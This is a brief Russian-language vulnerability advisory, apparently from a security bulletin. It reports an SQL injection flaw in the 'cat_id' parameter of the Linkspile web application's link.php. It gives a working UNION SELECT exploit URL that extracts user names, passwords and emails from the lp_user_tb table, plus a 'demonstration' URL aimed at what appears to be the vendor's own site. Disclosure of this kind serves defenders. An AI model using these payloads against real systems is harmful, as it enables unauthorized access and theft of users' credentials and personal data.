Программа: Linkspile
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «cat_id» сценарием link.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
http://www.example.com/link.php?cat_id=-1/**/union/**/select/**/1,2,3,4,5,6, concat(fname,0x3a,0x3a,0x3a,password,0x3a,0x3a,0x3a,email), 8,9,10,11,12,13,14,15,16,17,18/**/from/**/lp_user_tb/*
Демонстрация:
http://www.linkspile.com/linking.page.php?cat_id=-1/**/union/**/select/* */1,2,3,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0x3a,0x3a,0x3a,email), 8,9,10,11,12,13,14,15,16,17,18/**/from/**/lp_user_tb/*
